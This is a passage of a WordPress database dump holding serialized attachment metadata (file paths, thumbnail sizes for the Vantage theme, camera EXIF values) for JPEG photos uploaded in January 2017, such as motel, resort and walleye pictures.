182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:4:\"4896\";s:13:\"shutter_speed\";s:15:\"0.0833333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(594,302,'_wp_attached_file','2017/01/Motel.jpg'),(595,302,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:17:\"2017/01/Motel.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Motel-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Motel-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:17:\"Motel-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:17:\"Motel-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"Motel-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:17:\"Motel-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:17:\"Motel-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:17:\"Motel-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:17:\"Motel-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:17:\"Motel-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1157800353\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.9\";s:3:\"iso\";s:4:\"3424\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(596,303,'_wp_attached_file','2017/01/PIC00603.jpg'),(597,303,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2017/01/PIC00603.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00603-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"PIC00603-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00603-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00603-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00603-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"PIC00603-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"PIC00603-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"PIC00603-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"PIC00603-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"PIC00603-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:15:\"0.0833333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(598,304,'_wp_attached_file','2017/01/PIC00607.jpg'),(599,304,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2017/01/PIC00607.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00607-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"PIC00607-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00607-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00607-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00607-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"PIC00607-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"PIC00607-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"PIC00607-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"PIC00607-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"PIC00607-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(600,305,'_wp_attached_file','2017/01/PIC00613.jpg'),(601,305,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2017/01/PIC00613.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00613-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"PIC00613-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00613-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00613-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00613-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"PIC00613-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"PIC00613-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"PIC00613-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"PIC00613-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"PIC00613-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:15:\"0.0833333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(602,306,'_wp_attached_file','2017/01/PIC00624.jpg'),(603,306,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2017/01/PIC00624.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00624-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"PIC00624-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00624-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00624-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00624-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"PIC00624-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"PIC00624-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"PIC00624-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"PIC00624-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"PIC00624-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:15:\"0.0208333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(604,307,'_wp_attached_file','2017/01/PIC00631.jpg'),(605,307,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2017/01/PIC00631.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00631-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"PIC00631-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00631-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"PIC00631-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"PIC00631-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"PIC00631-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"PIC00631-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"PIC00631-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"PIC00631-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"PIC00631-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:15:\"0.0833333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(606,308,'_wp_attached_file','2017/01/ResortPics.jpg'),(607,308,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:22:\"2017/01/ResortPics.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"ResortPics-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"ResortPics-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:22:\"ResortPics-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:22:\"ResortPics-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"ResortPics-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"ResortPics-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:22:\"ResortPics-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:22:\"ResortPics-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:22:\"ResortPics-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:22:\"ResortPics-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1183143286\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(608,309,'_wp_attached_file','2017/01/Walleye-001.jpg'),(609,309,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:23:\"2017/01/Walleye-001.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Walleye-001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Walleye-001-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:23:\"Walleye-001-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:23:\"Walleye-001-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"Walleye-001-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:23:\"Walleye-001-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:23:\"Walleye-001-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:23:\"Walleye-001-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:23:\"Walleye-001-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:23:\"Walleye-001-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1181928701\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"44.3\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(610,310,'_wp_attached_file','2017/01/Walleye11.jpg'),(611,310,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:21:\"2017/01/Walleye11.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Walleye11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Walleye11-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Walleye11-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Walleye11-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Walleye11-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"Walleye11-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Walleye11-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Walleye11-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Walleye11-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Walleye11-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1184760919\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"72\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(612,311,'_wp_attached_file','2017/01/DSC05132.jpg'),(613,311,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:20:\"2017/01/DSC05132.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC05132-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC05132-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC05132-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC05132-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC05132-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC05132-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC05132-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC05132-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC05132-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC05132-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC05132-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSC05132-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a: